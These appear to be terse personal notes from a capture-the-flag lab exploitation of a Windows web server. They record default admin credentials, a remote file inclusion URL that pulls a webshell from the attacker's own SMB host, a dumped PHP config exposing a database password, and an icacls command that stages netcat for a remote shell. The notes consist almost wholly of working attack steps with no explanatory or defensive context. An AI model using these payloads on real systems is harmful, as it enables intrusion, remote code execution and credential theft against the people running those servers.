creds at http://10.10.10.151/user/index.php
admin:admin

Chris

http://10.10.10.151/blog/?lang=\\10.10.14.219\ica\webshell.php

C:\inetpub\wwwroot\user>type db.php
type db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>


icacls nc.exe /grant Everyone:F
